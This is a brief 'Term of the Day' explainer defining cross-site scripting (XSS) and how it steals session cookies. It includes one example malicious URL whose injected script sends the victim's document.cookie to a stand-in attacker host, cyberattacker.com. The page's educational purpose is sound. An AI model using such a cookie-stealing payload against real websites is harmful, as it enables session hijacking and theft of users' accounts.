[Term of the Day]: Cross-site scripting
Term of the Day
"Cross-Site Scripting"
What is Cross-Site Scripting?
Cross-site scripting, also known as XSS or CSS, is a security vulnerability that occurs when a cyber attacker injects a malicious script - generally in the form of browser-side scripts like HTML markup or JavaScript - in web applications.
How does it work?
In XSS vulnerability, the objective of cyber attacker is to steal the data of the user by running a malicious script in his browser which is injected on the website content which the user is using through different means.
Say, when a user searches for some text on a website, then the request is sent to the server in the form:
In the search result, the website returns the result along with what the user searched for like:
You searched for howto
If the search functionality is vulnerable to XSS, then the attacker can add the malicious script in the URL :
https://www.website.com/search=<script> document location=https://cyberattacker.com/log.php?c=’ +encodeURIComponent(document.cookie)</script>
When the user clicks on this link, it redirects to the malicious website, i.e. https://cyberattacker.com and all the browser data is directly sent to the cyber attacker’s computer resulting in the attacker stealing all the session token/cookies.